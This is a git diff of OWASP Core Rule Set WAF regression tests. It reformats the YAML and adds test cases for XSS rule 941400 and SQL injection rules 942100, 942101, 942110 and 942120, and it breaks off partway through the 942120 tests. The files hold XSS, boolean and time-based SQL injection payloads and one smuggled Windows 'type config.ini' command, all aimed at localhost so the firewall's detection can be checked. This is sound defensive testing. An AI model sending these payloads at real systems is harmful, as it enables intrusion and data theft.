'/?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-6 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-7 + desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?test=Reflect.sort.call%60%60' + version: HTTP/1.1 + output: + log_contains: id "941400" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 7e8337545e..7127cc95f0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml @@ -1,245 +1,245 @@ --- - meta: - author: "Christian Folini" - description: Various SQL injection tests - enabled: true - name: 942100.yaml - tests: - - - test_title: 942100-1 +meta: + author: "Christian Folini" + description: Various SQL injection tests + enabled: true + name: 942100.yaml +tests: + - test_title: 942100-1 desc: "Simple SQL Injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=1234 OR 1=1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-2 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=-1839' or '1'='1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-3 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=-1839\x22 or \x221\x22=\x222" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-4 desc: "Basic SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-5 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=EmptyValue' and 526=527" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue' and 526=527" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-6 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=foo') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-7 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-8 desc: "Simple SQL Injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-9 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-10 desc: "Advanced SQL Injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "1'||(select extractvalue(xmltype('%toyop;" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-11 desc: "Simple function call" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-12 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=unittests@coreruleset.org\x22 sleep(10.to_i) \x22" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-13 desc: "Advanced injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x22 | type %SystemDrive%\x5c\x5cconfig.ini | \x22" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-14 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-14 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x22unittests@coreruleset.org\x22'))\x20and (select*from(select(sleep(5)))x) --" - version: HTTP/1.0 - output: - log_contains: id "942100" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log_contains: id "942100" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml index 0b11a9bf05..8b685625a2 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml @@ -1,104 +1,183 @@ --- - meta: - author: "Christian Folini" - description: Various SQL injection tests - enabled: true - name: 942101.yaml - tests: - - - test_title: 942101-1 +meta: + author: "Christian Folini, Matteo Pace" + description: Various SQL injection tests + enabled: true + name: 942101.yaml +tests: + - test_title: 942101-1 desc: "Simple SQL Injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/1234%20OR%201=1" - version: HTTP/1.0 - output: - log_contains: id "942101" - - - - test_title: 942101-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/1234%20OR%201=1" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-2 desc: "Basic SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942101" - - - test_title: 942101-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-3 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/EmptyValue'%20and%20526=527" - version: HTTP/1.0 - output: - log_contains: id "942101" - - - test_title: 942101-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-4 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942101" - - - test_title: 942101-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-5 desc: "Simple function call" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942101" - - - test_title: 942101-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-6 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/unittests@coreruleset.org\x22%20sleep(10.to_i)%20\x22" - version: HTTP/1.0 - output: - log_contains: id "942101" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-7 + desc: "SQL Injection at the last segment of the path (request_basename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24'union+all+select+1,2,3+from+aa" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-8 + desc: "SQL Injection inside the path (request_filename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24'union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-9 + desc: "SQL Injection inside the path with comment block (request_filename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/%2A/%2A/2+union+all/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-10 + desc: "Negative test with incomplete SQL command inside the path" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/9'union+all/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" + - test_title: 942101-11 + desc: "Negative test with complete SQL command inside the path, but without comma" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24+union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml deleted file mode 100644 index c7e1182cbe..0000000000 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml +++ /dev/null @@ -1,24 +0,0 @@ ---- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942110.yaml - tests: - - - test_title: 942110-1 - desc: "Common SQL Injection Testing" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - # NB: false positives: /?var=\'\' - data: "var=%27%27" - version: HTTP/1.0 - output: - log_contains: id "942110" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index 4c07224612..b2cf47bcbb 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -1,363 +1,674 @@ --- - meta: - author: "Christian S.J. Peron, Christoph Hansen" - description: None - enabled: true - name: 942120.yaml - tests: - - - test_title: 942120-1 +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler" + description: None + enabled: true + name: 942120.yaml +tests: + - test_title: 942120-1 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=blahblah&var2=LIKE%20NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-2 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=RegExp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-3 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ">>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ">>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-4 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=%26%26" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-5 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "<<" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "<<" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-6 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "%21%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "%21%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-7 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "||" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "||" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-8 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "XOR" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "XOR" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-9 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=%3C%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-10 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "IS NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "IS NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-11 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "in (0,1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "in (0,1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-12 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "in (2147483647,-1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-13 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=%3C%3D%3E" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-14 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-14 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "regexp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-15 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "regexp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-15 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "RLIKE" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-16 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RLIKE" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-16 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "<>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-17 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "<>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-17 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-18 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-18 desc: "SQL Injection Attack: SQL Operator Detected" stages: 